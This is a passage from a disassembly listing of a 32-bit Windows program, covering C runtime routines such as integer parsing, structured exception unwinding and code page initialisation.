mov [ebp+ms_exc.disabled], 0FFFFFFFEh
mov eax, [ebp+var_20]
call __SEH_epilog4
retn
sub_407B1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407BE1 proc near ; CODE XREF: sub_407E0C:loc_407E2B�p
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
push [ebp+arg_0]
lea ecx, [ebp+var_14]
call sub_4048C8
mov eax, [ebp+arg_8]
mov esi, [ebp+arg_4]
xor edi, edi
cmp eax, edi
jz short loc_407C02
mov [eax], esi
loc_407C02: ; CODE XREF: sub_407BE1+1D�j
cmp esi, edi
jnz short loc_407C32
loc_407C06: ; CODE XREF: sub_407BE1+5A�j
; sub_407BE1+60�j
call sub_403F8F
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_404E8B
add esp, 14h
cmp [ebp+var_8], 0
jz short loc_407C2B
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_407C2B: ; CODE XREF: sub_407BE1+41�j
xor eax, eax
jmp loc_407E08
; ---------------------------------------------------------------------------
loc_407C32: ; CODE XREF: sub_407BE1+23�j
cmp [ebp+arg_C], edi
jz short loc_407C43
cmp [ebp+arg_C], 2
jl short loc_407C06
cmp [ebp+arg_C], 24h
jg short loc_407C06
loc_407C43: ; CODE XREF: sub_407BE1+54�j
mov ecx, [ebp+var_14]
push ebx
mov bl, [esi]
mov [ebp+var_4], edi
lea edi, [esi+1]
loc_407C4F: ; CODE XREF: sub_407BE1+A5�j
cmp dword ptr [ecx+0ACh], 1
jle short loc_407C6F
lea eax, [ebp+var_14]
push eax
movzx eax, bl
push 8
push eax
call sub_40AB1F
mov ecx, [ebp+var_14]
add esp, 0Ch
jmp short loc_407C7F
; ---------------------------------------------------------------------------
loc_407C6F: ; CODE XREF: sub_407BE1+75�j
mov edx, [ecx+0C8h]
movzx eax, bl
movzx eax, byte ptr [edx+eax*2]
and eax, 8
loc_407C7F: ; CODE XREF: sub_407BE1+8C�j
test eax, eax
jz short loc_407C88
mov bl, [edi]
inc edi
jmp short loc_407C4F
; ---------------------------------------------------------------------------
loc_407C88: ; CODE XREF: sub_407BE1+A0�j
cmp bl, 2Dh
jnz short loc_407C93
or [ebp+arg_10], 2
jmp short loc_407C98
; ---------------------------------------------------------------------------
loc_407C93: ; CODE XREF: sub_407BE1+AA�j
cmp bl, 2Bh
jnz short loc_407C9B
loc_407C98: ; CODE XREF: sub_407BE1+B0�j
mov bl, [edi]
inc edi
loc_407C9B: ; CODE XREF: sub_407BE1+B5�j
mov eax, [ebp+arg_C]
test eax, eax
jl loc_407DEF
cmp eax, 1
jz loc_407DEF
cmp eax, 24h
jg loc_407DEF
test eax, eax
jnz short loc_407CE6
cmp bl, 30h
jz short loc_407CCA
mov [ebp+arg_C], 0Ah
jmp short loc_407CFE
; ---------------------------------------------------------------------------
loc_407CCA: ; CODE XREF: sub_407BE1+DE�j
mov al, [edi]
cmp al, 78h
jz short loc_407CDD
cmp al, 58h
jz short loc_407CDD
mov [ebp+arg_C], 8
jmp short loc_407CFE
; ---------------------------------------------------------------------------
loc_407CDD: ; CODE XREF: sub_407BE1+ED�j
; sub_407BE1+F1�j
mov [ebp+arg_C], 10h
jmp short loc_407CF0
; ---------------------------------------------------------------------------
loc_407CE6: ; CODE XREF: sub_407BE1+D9�j
cmp eax, 10h
jnz short loc_407CFE
cmp bl, 30h
jnz short loc_407CFE
loc_407CF0: ; CODE XREF: sub_407BE1+103�j
mov al, [edi]
cmp al, 78h
jz short loc_407CFA
cmp al, 58h
jnz short loc_407CFE
loc_407CFA: ; CODE XREF: sub_407BE1+113�j
inc edi
mov bl, [edi]
inc edi
loc_407CFE: ; CODE XREF: sub_407BE1+E7�j
; sub_407BE1+FA�j ...
mov esi, [ecx+0C8h]
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_C]
loc_407D0C: ; CODE XREF: sub_407BE1+19D�j
movzx ecx, bl
movzx ecx, word ptr [esi+ecx*2]
test cl, 4
jz short loc_407D20
movsx ecx, bl
sub ecx, 30h
jmp short loc_407D3A
; ---------------------------------------------------------------------------
loc_407D20: ; CODE XREF: sub_407BE1+135�j
test cx, 103h
jz short loc_407D58
mov cl, bl
sub cl, 61h
cmp cl, 19h
movsx ecx, bl
ja short loc_407D37
sub ecx, 20h
loc_407D37: ; CODE XREF: sub_407BE1+151�j
add ecx, 0FFFFFFC9h
loc_407D3A: ; CODE XREF: sub_407BE1+13D�j
cmp ecx, [ebp+arg_C]
jnb short loc_407D58
or [ebp+arg_10], 8
cmp [ebp+var_4], eax
jb short loc_407D6F
jnz short loc_407D4E
cmp ecx, edx
jbe short loc_407D6F
loc_407D4E: ; CODE XREF: sub_407BE1+167�j
or [ebp+arg_10], 4
cmp [ebp+arg_8], 0
jnz short loc_407D7B
loc_407D58: ; CODE XREF: sub_407BE1+144�j
; sub_407BE1+15C�j
mov eax, [ebp+arg_10]
dec edi
test al, 8
jnz short loc_407D80
cmp [ebp+arg_8], 0
jz short loc_407D69
mov edi, [ebp+arg_4]
loc_407D69: ; CODE XREF: sub_407BE1+183�j
and [ebp+var_4], 0
jmp short loc_407DCB
; ---------------------------------------------------------------------------
loc_407D6F: ; CODE XREF: sub_407BE1+165�j
; sub_407BE1+16B�j
mov ebx, [ebp+var_4]
imul ebx, [ebp+arg_C]
add ebx, ecx
mov [ebp+var_4], ebx
loc_407D7B: ; CODE XREF: sub_407BE1+175�j
mov bl, [edi]
inc edi
jmp short loc_407D0C
; ---------------------------------------------------------------------------
loc_407D80: ; CODE XREF: sub_407BE1+17D�j
test al, 4
mov esi, 7FFFFFFFh
jnz short loc_407DA4
test al, 1
jnz short loc_407DCB
and eax, 2
jz short loc_407D9B
cmp [ebp+var_4], 80000000h
ja short loc_407DA4
loc_407D9B: ; CODE XREF: sub_407BE1+1AF�j
test eax, eax
jnz short loc_407DCB
cmp [ebp+var_4], esi
jbe short loc_407DCB
loc_407DA4: ; CODE XREF: sub_407BE1+1A6�j
; sub_407BE1+1B8�j
call sub_403F8F
test byte ptr [ebp+arg_10], 1
mov dword ptr [eax], 22h
jz short loc_407DBB
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_407DCB
; ---------------------------------------------------------------------------
loc_407DBB: ; CODE XREF: sub_407BE1+1D2�j
mov al, byte ptr [ebp+arg_10]
and al, 2
neg al
sbb eax, eax
neg eax
add eax, esi
mov [ebp+var_4], eax
loc_407DCB: ; CODE XREF: sub_407BE1+18C�j
; sub_407BE1+1AA�j ...
mov eax, [ebp+arg_8]
test eax, eax
jz short loc_407DD4
mov [eax], edi
loc_407DD4: ; CODE XREF: sub_407BE1+1EF�j
test byte ptr [ebp+arg_10], 2
jz short loc_407DDD
neg [ebp+var_4]
loc_407DDD: ; CODE XREF: sub_407BE1+1F7�j
cmp [ebp+var_8], 0
jz short loc_407DEA
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_407DEA: ; CODE XREF: sub_407BE1+200�j
mov eax, [ebp+var_4]
jmp short loc_407E07
; ---------------------------------------------------------------------------
loc_407DEF: ; CODE XREF: sub_407BE1+BF�j
; sub_407BE1+C8�j ...
mov eax, [ebp+arg_8]
test eax, eax
jz short loc_407DF8
mov [eax], esi
loc_407DF8: ; CODE XREF: sub_407BE1+213�j
cmp [ebp+var_8], 0
jz short loc_407E05
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_407E05: ; CODE XREF: sub_407BE1+21B�j
xor eax, eax
loc_407E07: ; CODE XREF: sub_407BE1+20C�j
pop ebx
loc_407E08: ; CODE XREF: sub_407BE1+4C�j
pop edi
pop esi
leave
retn
sub_407BE1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407E0C proc near ; CODE XREF: sub_40454B+8�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
xor eax, eax
cmp dword_411C1C, eax
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
jnz short loc_407E2A
push offset off_410E90
jmp short loc_407E2B
; ---------------------------------------------------------------------------
loc_407E2A: ; CODE XREF: sub_407E0C+15�j
push eax
loc_407E2B: ; CODE XREF: sub_407E0C+1C�j
call sub_407BE1
add esp, 14h
pop ebp
retn
sub_407E0C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_407E38 proc near ; CODE XREF: sub_407E38+BD�p
; seg001:00407F1E�p ...
var_20 = dword ptr -20h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
mov edx, [esp+0Ch+arg_0]
mov eax, [esp+0Ch+arg_4]
mov ecx, [esp+0Ch+arg_8]
push ebp
push edx
push eax
push ecx
push ecx
push offset loc_407EC8
push large dword ptr fs:0
mov eax, dword_410440
xor eax, esp
mov [esp+28h+var_20], eax
mov large fs:0, esp
loc_407E6A: ; CODE XREF: sub_407E38+64�j
; sub_407E38+80�j
mov eax, [esp+28h+arg_4]
mov ebx, [eax+8]
mov ecx, [esp+28h+arg_0]
xor ebx, [ecx]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFEh
jz short loc_407EBA
mov edx, [esp+28h+arg_8]
cmp edx, 0FFFFFFFEh
jz short loc_407E8C
cmp esi, edx
jbe short loc_407EBA
loc_407E8C: ; CODE XREF: sub_407E38+4E�j
lea esi, [esi+esi*2]
lea ebx, [ebx+esi*4+10h]
mov ecx, [ebx]
mov [eax+0Ch], ecx
cmp dword ptr [ebx+4], 0
jnz short loc_407E6A
push 101h
mov eax, [ebx+8]
call sub_40AD29
mov ecx, 1
mov eax, [ebx+8]
call sub_40AD48
jmp short loc_407E6A
; ---------------------------------------------------------------------------
loc_407EBA: ; CODE XREF: sub_407E38+45�j
; sub_407E38+52�j
pop large dword ptr fs:0
add esp, 18h
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_407EC8: ; DATA XREF: sub_407E38+14�o
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_407F0D
mov eax, [esp+arg_4]
mov ecx, [eax+8]
xor ecx, eax
call sub_403F45
push ebp
mov ebp, [eax+18h]
push dword ptr [eax+0Ch]
push dword ptr [eax+10h]
push dword ptr [eax+14h]
call sub_407E38
add esp, 0Ch
pop ebp
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_407F0D: ; CODE XREF: sub_407E38+A0�j
retn
sub_407E38 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
push dword ptr [ecx+1Ch]
push dword ptr [ecx+18h]
push dword ptr [ecx+28h]
call sub_407E38
add esp, 0Ch
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_407F2A proc near ; CODE XREF: sub_404650+89�p
push ebp
push esi
push edi
push ebx
mov ebp, edx
xor eax, eax
xor ebx, ebx
xor edx, edx
xor esi, esi
xor edi, edi
call ecx
pop ebx
pop edi
pop esi
pop ebp
retn
sub_407F2A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_404650
loc_407F41: ; CODE XREF: sub_404650+170�j
mov ebp, edx
mov esi, ecx
mov eax, ecx
push 1
call sub_40AD29
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
xor edi, edi
jmp esi
; END OF FUNCTION CHUNK FOR sub_404650
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F5A proc near ; CODE XREF: sub_404650+11F�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
push 0
push 0
push offset loc_407F6F
push ecx
call sub_40C5BE ; RtlUnwind
loc_407F6F: ; DATA XREF: sub_407F5A+A�o
pop edi
pop esi
pop ebx
pop ebp
retn
sub_407F5A endp
; =============== S U B R O U T I N E =======================================
sub_407F74 proc near ; CODE XREF: sub_404650+137�p
; sub_404650+18C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebp
mov ebp, [esp+4+arg_0]
push edx
push ecx
push [esp+0Ch+arg_4]
call sub_407E38
add esp, 0Ch
pop ebp
retn 8
sub_407F74 endp
; =============== S U B R O U T I N E =======================================
sub_407F8B proc near ; CODE XREF: sub_4082B7+14C�p
; sub_4082B7+1A1�p
sub eax, 3A4h
jz short loc_407FB4
sub eax, 4
jz short loc_407FAE
sub eax, 0Dh
jz short loc_407FA8
dec eax
jz short loc_407FA2
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_407FA2: ; CODE XREF: sub_407F8B+12�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_407FA8: ; CODE XREF: sub_407F8B+F�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_407FAE: ; CODE XREF: sub_407F8B+A�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_407FB4: ; CODE XREF: sub_407F8B+5�j
mov eax, 411h
retn
sub_407F8B endp
; =============== S U B R O U T I N E =======================================
sub_407FBA proc near ; CODE XREF: sub_4082B7+2B�p
push ebx
push ebp
push esi
push edi
mov ebp, 101h
mov esi, eax
push ebp
xor edi, edi
lea ebx, [esi+1Ch]
push edi
push ebx
call sub_403FE0
mov [esi+4], edi
mov [esi+8], edi
mov [esi+0Ch], edi
xor eax, eax
lea edi, [esi+10h]
stosd
stosd
stosd
mov eax, offset dword_410880
add esp, 0Ch
sub eax, esi
loc_407FED: ; CODE XREF: sub_407FBA+3A�j
mov cl, [eax+ebx]
mov [ebx], cl
inc ebx
dec ebp
jnz short loc_407FED
lea ecx, [esi+11Dh]
mov esi, 100h
loc_408001: ; CODE XREF: sub_407FBA+4E�j
mov dl, [ecx+eax]
mov [ecx], dl
inc ecx
dec esi
jnz short loc_408001
pop edi
pop esi
pop ebp
pop ebx
retn
sub_407FBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=49Ch
sub_40800F proc near ; CODE XREF: sub_4082B7+16F�p
var_51C = dword ptr -51Ch
var_518 = byte ptr -518h
var_512 = byte ptr -512h
var_511 = byte ptr -511h
var_504 = word ptr -504h
var_304 = byte ptr -304h
var_204 = byte ptr -204h
var_104 = byte ptr -104h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-49Ch]
sub esp, 51Ch
mov eax, dword_410440
xor eax, ebp
mov [ebp+49Ch+var_4], eax
push ebx
push edi
lea eax, [ebp+49Ch+var_518]
push eax
push dword ptr [esi+4]
call dword_40D180 ; GetCPInfo
test eax, eax
mov edi, 100h
jz loc_408135
xor eax, eax
loc_408048: ; CODE XREF: sub_40800F+43�j
mov [ebp+eax+49Ch+var_104], al
inc eax
cmp eax, edi
jb short loc_408048
mov al, [ebp+49Ch+var_512]
test al, al
mov [ebp+49Ch+var_104], 20h
jz short loc_40808D
lea ebx, [ebp+49Ch+var_511]
loc_408065: ; CODE XREF: sub_40800F+7C�j
movzx ecx, al
movzx eax, byte ptr [ebx]
cmp ecx, eax
ja short loc_408085
sub eax, ecx
inc eax
push eax
lea edx, [ebp+ecx+49Ch+var_104]
push 20h
push edx
call sub_403FE0
add esp, 0Ch
loc_408085: ; CODE XREF: sub_40800F+5E�j
inc ebx
mov al, [ebx]
inc ebx
test al, al
jnz short loc_408065
loc_40808D: ; CODE XREF: sub_40800F+51�j
push 0
push dword ptr [esi+0Ch]
lea eax, [ebp+49Ch+var_504]
push dword ptr [esi+4]
push eax
push edi
lea eax, [ebp+49Ch+var_104]
push eax
push 1
push 0
call sub_40B2E8
xor ebx, ebx
push ebx
push dword ptr [esi+4]
lea eax, [ebp+49Ch+var_204]
push edi
push eax
push edi
lea eax, [ebp+49Ch+var_104]
push eax
push edi
push dword ptr [esi+0Ch]
push ebx
call sub_40B0ED
add esp, 44h
push ebx
push dword ptr [esi+4]
lea eax, [ebp+49Ch+var_304]
push edi
push eax
push edi
lea eax, [ebp+49Ch+var_104]
push eax
push 200h
push dword ptr [esi+0Ch]
push ebx
call sub_40B0ED
add esp, 24h
xor eax, eax
loc_4080F4: ; CODE XREF: sub_40800F+122�j
movzx ecx, [ebp+eax*2+49Ch+var_504]
test cl, 1
jz short loc_40810C
or byte ptr [esi+eax+1Dh], 10h
mov cl, [ebp+eax+49Ch+var_204]
jmp short loc_40811D
; ---------------------------------------------------------------------------
loc_40810C: ; CODE XREF: sub_40800F+ED�j
test cl, 2
jz short loc_408126
or byte ptr [esi+eax+1Dh], 20h
mov cl, [ebp+eax+49Ch+var_304]
loc_40811D: ; CODE XREF: sub_40800F+FB�j
mov [esi+eax+11Dh], cl
jmp short loc_40812E
; ---------------------------------------------------------------------------
loc_408126: ; CODE XREF: sub_40800F+100�j
mov byte ptr [esi+eax+11Dh], 0
loc_40812E: ; CODE XREF: sub_40800F+115�j
inc eax
cmp eax, edi
jb short loc_4080F4
jmp short loc_408182
; ---------------------------------------------------------------------------
loc_408135: ; CODE XREF: sub_40800F+31�j
lea eax, [esi+11Dh]
mov [ebp+49Ch+var_51C], 0FFFFFF9Fh
xor ecx, ecx
sub [ebp+49Ch+var_51C], eax
loc_408147: ; CODE XREF: sub_40800F+171�j
mov edx, [ebp+49Ch+var_51C]
lea eax, [esi+ecx+11Dh]
add edx, eax
lea ebx, [edx+20h]
cmp ebx, 19h
ja short loc_408167
or byte ptr [esi+ecx+1Dh], 10h
mov dl, cl
add dl, 20h
jmp short loc_408176
; ---------------------------------------------------------------------------
loc_408167: ; CODE XREF: sub_40800F+14A�j
cmp edx, 19h
ja short loc_40817A
or byte ptr [esi+ecx+1Dh], 20h
mov dl, cl
sub dl, 20h
loc_408176: ; CODE XREF: sub_40800F+156�j
mov [eax], dl
jmp short loc_40817D
; ---------------------------------------------------------------------------
loc_40817A: ; CODE XREF: sub_40800F+15B�j
mov byte ptr [eax], 0
loc_40817D: ; CODE XREF: sub_40800F+169�j
inc ecx
cmp ecx, edi
jb short loc_408147
loc_408182: ; CODE XREF: sub_40800F+124�j
mov ecx, [ebp+49Ch+var_4]
pop edi
xor ecx, ebp
pop ebx
call sub_403F45
add ebp, 49Ch
leave
retn
sub_40800F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408199 proc near ; CODE XREF: sub_4048C8+57�p
; sub_408490+1A�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset dword_40E640
call __SEH_prolog4
call sub_4064E8
mov edi, eax
mov eax, dword_410DA4
test [edi+70h], eax
jz short loc_4081D3
cmp dword ptr [edi+6Ch], 0
jz short loc_4081D3
mov esi, [edi+68h]
loc_4081BF: ; CODE XREF: sub_408199+96�j
test esi, esi
jnz short loc_4081CB
push 20h
call sub_40422F
pop ecx
loc_4081CB: ; CODE XREF: sub_408199+28�j
mov eax, esi
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_4081D3: ; CODE XREF: sub_408199+1B�j
; sub_408199+21�j
push 0Dh
call sub_405121
pop ecx
and [ebp+ms_exc.disabled], 0
mov esi, [edi+68h]
mov [ebp+var_1C], esi
cmp esi, dword_410CA8
jz short loc_408223
test esi, esi
jz short loc_40820B
push esi
call dword_40D16C ; InterlockedDecrement
test eax, eax
jnz short loc_40820B
cmp esi, offset dword_410880
jz short loc_40820B
push esi
call sub_40405A
pop ecx
loc_40820B: ; CODE XREF: sub_408199+56�j
; sub_408199+61�j ...
mov eax, dword_410CA8
mov [edi+68h], eax
mov esi, dword_410CA8
mov [ebp+var_1C], esi
push esi
call dword_40D160 ; InterlockedIncrement
loc_408223: ; CODE XREF: sub_408199+52�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_408234
jmp short loc_4081BF
sub_408199 endp
; =============== S U B R O U T I N E =======================================
sub_408231 proc near ; DATA XREF: seg001:0040E658�o
mov esi, [ebp-1Ch]
sub_408231 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_408234 proc near ; CODE XREF: sub_408199+91�p
push 0Dh
call sub_405049
pop ecx
retn
sub_408234 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40823D proc near ; CODE XREF: sub_4082B7+19�p
; sub_408490+25�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
push ebx
lea ecx, [ebp+var_10]
call sub_4048C8
cmp esi, 0FFFFFFFEh
mov dword_411C00, ebx
jnz short loc_408278
mov dword_411C00, 1
call dword_40D188 ; GetOEMCP
loc_40826A: ; CODE XREF: sub_40823D+50�j
; sub_40823D+67�j
cmp [ebp+var_4], bl
jz short loc_4082B4
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_4082B4
; ---------------------------------------------------------------------------
loc_408278: ; CODE XREF: sub_40823D+1B�j
cmp esi, 0FFFFFFFDh
jnz short loc_40828F
mov dword_411C00, 1
call dword_40D184 ; GetACP
jmp short loc_40826A
; ---------------------------------------------------------------------------
loc_40828F: ; CODE XREF: sub_40823D+3E�j
cmp esi, 0FFFFFFFCh
jnz short loc_4082A6
mov eax, [ebp+var_10]
mov eax, [eax+4]
mov dword_411C00, 1
jmp short loc_40826A
; ---------------------------------------------------------------------------
loc_4082A6: ; CODE XREF: sub_40823D+55�j
cmp [ebp+var_4], bl
jz short loc_4082B2
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4082B2: ; CODE XREF: sub_40823D+6C�j
mov eax, esi
loc_4082B4: ; CODE XREF: sub_40823D+30�j
; sub_40823D+39�j
pop ebx
leave
retn
sub_40823D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4082B7 proc near ; CODE XREF: sub_408490+5E�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword_410440
xor eax, ebp
mov [ebp+var_4], eax
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
push edi
call sub_40823D
mov edi, eax
xor esi, esi
cmp edi, esi
mov [ebp+arg_0], edi
jnz short loc_4082EE
loc_4082E0: ; CODE XREF: sub_4082B7+1C1�j
mov eax, ebx
call sub_407FBA
loc_4082E7: ; CODE XREF: sub_4082B7+174�j
xor eax, eax
jmp loc_408481
; ---------------------------------------------------------------------------
loc_4082EE: ; CODE XREF: sub_4082B7+27�j
mov [ebp+var_1C], esi
xor eax, eax
loc_4082F3: ; CODE XREF: sub_4082B7+53�j
cmp dword_410CB0[eax], edi
jz loc_408390
inc [ebp+var_1C]
add eax, 30h
cmp eax, 0F0h
jb short loc_4082F3
cmp edi, 0FDE8h
jz loc_40847E
cmp edi, 0FDE9h
jz loc_40847E
movzx eax, di
push eax
call dword_40D18C ; IsValidCodePage
test eax, eax
jz loc_40847E
lea eax, [ebp+var_18]
push eax
push edi
call dword_40D180 ; GetCPInfo
test eax, eax
jz loc_408472
push 101h
lea eax, [ebx+1Ch]
push esi
push eax
call sub_403FE0
xor edx, edx
inc edx
add esp, 0Ch
cmp [ebp+var_18], edx
mov [ebx+4], edi
mov [ebx+0Ch], esi
jbe loc_408465
cmp [ebp+var_12], 0
jz loc_408446
lea esi, [ebp+var_11]
loc_40837A: ; CODE XREF: sub_4082B7+189�j
mov cl, [esi]
test cl, cl
jz loc_408446
movzx eax, byte ptr [esi-1]
movzx ecx, cl
jmp loc_408436
; ---------------------------------------------------------------------------
loc_408390: ; CODE XREF: sub_4082B7+42�j
push 101h
lea eax, [ebx+1Ch]
push esi
push eax
call sub_403FE0
mov ecx, [ebp+var_1C]
add esp, 0Ch
imul ecx, 30h
mov [ebp+var_20], esi
lea esi, dword_410CC0[ecx]
mov [ebp+var_1C], esi
jmp short loc_4083E0
; ---------------------------------------------------------------------------
loc_4083B6: ; CODE XREF: sub_4082B7+12C�j
mov al, [esi+1]
test al, al
jz short loc_4083E5
movzx edi, byte ptr [esi]
movzx eax, al
jmp short loc_4083D7
; ---------------------------------------------------------------------------
loc_4083C5: ; CODE XREF: sub_4082B7+122�j
mov eax, [ebp+var_20]
mov al, byte_410CAC[eax]
or [ebx+edi+1Dh], al
movzx eax, byte ptr [esi+1]
inc edi
loc_4083D7: ; CODE XREF: sub_4082B7+10C�j
cmp edi, eax
jbe short loc_4083C5
mov edi, [ebp+arg_0]
inc esi
inc esi
loc_4083E0: ; CODE XREF: sub_4082B7+FD�j
; sub_4082B7+13E�j
cmp byte ptr [esi], 0
jnz short loc_4083B6
loc_4083E5: ; CODE XREF: sub_4082B7+104�j
mov esi, [ebp+var_1C]
inc [ebp+var_20]
add esi, 8
cmp [ebp+var_20], 4
mov [ebp+var_1C], esi
jb short loc_4083E0
mov eax, edi
mov [ebx+4], edi
mov dword ptr [ebx+8], 1
call sub_407F8B
push 6
mov [ebx+0Ch], eax
lea eax, [ebx+10h]
lea ecx, dword_410CB4[ecx]
pop edx
loc_408417: ; CODE XREF: sub_4082B7+16B�j
mov si, [ecx]
inc ecx
mov [eax], si
inc ecx
inc eax
inc eax
dec edx
jnz short loc_408417
loc_408424: ; CODE XREF: sub_4082B7+1B9�j
mov esi, ebx
call sub_40800F
jmp loc_4082E7
; ---------------------------------------------------------------------------
loc_408430: ; CODE XREF: sub_4082B7+181�j
or byte ptr [ebx+eax+1Dh], 4
inc eax
loc_408436: ; CODE XREF: sub_4082B7+D4�j
cmp eax, ecx
jbe short loc_408430
inc esi
inc esi
cmp byte ptr [esi-1], 0
jnz loc_40837A
loc_408446: ; CODE XREF: sub_4082B7+BA�j
; sub_4082B7+C7�j
lea eax, [ebx+1Eh]
mov ecx, 0FEh
loc_40844E: ; CODE XREF: sub_4082B7+19C�j
or byte ptr [eax], 8
inc eax
dec ecx
jnz short loc_40844E
mov eax, [ebx+4]
call sub_407F8B
mov [ebx+0Ch], eax
mov [ebx+8], edx
jmp short loc_408468
; ---------------------------------------------------------------------------
loc_408465: ; CODE XREF: sub_4082B7+B0�j
mov [ebx+8], esi
loc_408468: ; CODE XREF: sub_4082B7+1AC�j
xor eax, eax
lea edi, [ebx+10h]
stosd
stosd
stosd
jmp short loc_408424
; ---------------------------------------------------------------------------
loc_408472: ; CODE XREF: sub_4082B7+8C�j
cmp dword_411C00, esi
jnz loc_4082E0
loc_40847E: ; CODE XREF: sub_4082B7+5B�j
; sub_4082B7+67�j ...
or eax, 0FFFFFFFFh
loc_408481: ; CODE XREF: sub_4082B7+32�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_403F45
leave
retn
sub_4082B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408490 proc near ; CODE XREF: sub_40862A+B�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 004085FC SIZE 0000002E BYTES
push 14h
push offset dword_40E660
call __SEH_prolog4
or [ebp+var_20], 0FFFFFFFFh
call sub_4064E8
mov edi, eax
mov [ebp+var_24], edi
call sub_408199
mov ebx, [edi+68h]
mov esi, [ebp+arg_0]
call sub_40823D
mov [ebp+arg_0], eax
cmp eax, [ebx+4]
jz loc_40861D
push 220h
call sub_409323
pop ecx
mov ebx, eax
test ebx, ebx
jz loc_408621
mov ecx, 88h
mov esi, [edi+68h]
mov edi, ebx
rep movsd
and dword ptr [ebx], 0
push ebx
push [ebp+arg_0]
call sub_4082B7
pop ecx
pop ecx
mov [ebp+var_20], eax
test eax, eax
jnz loc_4085FC
mov esi, [ebp+var_24]
push dword ptr [esi+68h]
call dword_40D16C ; InterlockedDecrement
test eax, eax
jnz short loc_408521
mov eax, [esi+68h]
cmp eax, offset dword_410880
jz short loc_408521
push eax
call sub_40405A
pop ecx
loc_408521: ; CODE XREF: sub_408490+7E�j
; sub_408490+88�j
mov [esi+68h], ebx
push ebx
mov edi, dword_40D160
call edi ; InterlockedIncrement
test byte ptr [esi+70h], 2
jnz loc_408621
test byte ptr dword_410DA4, 1
jnz loc_408621
push 0Dh
call sub_405121
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [ebx+4]
mov dword_411C10, eax
mov eax, [ebx+8]
mov dword_411C14, eax
mov eax, [ebx+0Ch]
mov dword_411C18, eax
xor eax, eax
loc_40856A: ; CODE XREF: sub_408490+F0�j
mov [ebp+var_1C], eax
cmp eax, 5
jge short loc_408582
mov cx, [ebx+eax*2+10h]
mov word_411C04[eax*2], cx
inc eax
jmp short loc_40856A
; ---------------------------------------------------------------------------
loc_408582: ; CODE XREF: sub_408490+E0�j
xor eax, eax
loc_408584: ; CODE XREF: sub_408490+109�j
mov [ebp+var_1C], eax
cmp eax, 101h
jge short loc_40859B
mov cl, [eax+ebx+1Ch]
mov byte_410AA0[eax], cl
inc eax
jmp short loc_408584
; ---------------------------------------------------------------------------
loc_40859B: ; CODE XREF: sub_408490+FC�j
xor eax, eax
loc_40859D: ; CODE XREF: sub_408490+125�j
mov [ebp+var_1C], eax
cmp eax, 100h
jge short loc_4085B7
mov cl, [eax+ebx+11Dh]
mov byte_410BA8[eax], cl
inc eax
jmp short loc_40859D
